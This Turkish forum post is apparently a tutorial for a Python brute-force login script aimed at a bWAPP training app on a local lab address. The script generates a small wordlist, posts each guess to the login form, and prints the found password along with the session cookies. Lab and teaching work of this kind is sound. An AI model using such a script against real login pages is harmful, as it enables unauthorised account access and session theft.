brute force için kodun bazı bölümlerinde siteye ozel kodlar gereklidir mesela biz siteye login olurken site ne gibi bilgiler gönderiyor bunları öğrenip bir sözlük içinde brute force işlemlerimizi gerçekleştirmemiz lazım ben kullanıcı adımı ve şifremi girdiğimde site şöyle bir değer gönderiyor
bu bölümü bulmak için sitede sağ tık yapıp
denetle>ağ>tümü
ingilizce kullanıyorsanız
Inspect>Network>All
bu verilere bakarak benim post işlemlerimi şöyle yapmam lazım
{"login": "bee","password": "bug","security_level": "0","form": "submit"}
verileri bu şekilde gonderirsem bi anlam ifade eder aksi takdirde login gerçekleşmez
kodumuzun içinde wordlist adında bir değişken var içeriğini buradan görebilirsiniz :
kodlar
çıktımız :
deyatlara indiğim python ile brute force aracı yazımı ile ilgili videom :
video
kodlar :
Python:
import requests
import subprocess
site = "http://192.168.1.39/bWAPP/login.php"
kullanıcı_adı = input("kullanıcı adını girin\n")
subprocess.call("cls" or "clear",shell=True) #terminal'i temizliyoruz
#kelime = "qwertyuıopğüasdfghjklşizxcvbnmöç"
kelime = "vebgua" #çıktıyı hızlı vermesi icin küçük bir değer giriyoruz isterseniz buraya yorum satırı ekleyip yukardakini kullanabilirsiniz
wordlist = [i+a+t for i in kelime for a in kelime for t in kelime] # burada 3 boyutlu harfler ile oluşturulabilecek bütün şifreler var
çerezler = {}
for i in wordlist:
degerler = {"login": f"{kullanıcı_adı}","password": f"{i}","security_level": "0","form": "submit"}
a = requests.post(site,data=degerler)
if a.url != "http://192.168.1.39/bWAPP/login.php": #login sayfasından geçip ana sayfaya gittiysek şifre bulunmuş demektir
session = requests.Session() #oturumu tutuyoruz
session.post(site,data=degerler) #ve tekrar login oluyoruz
for cookie in session.cookies:
çerezler[cookie.name] = cookie.value #cookie değerlerini aliyoruz
break #döngüyü sonlandırıyoruz
print(f"kullanıcı adı : {kullanıcı_adı}")
print(f"şifre : {i}")
print(f"cookie değeri :\n{çerezler}")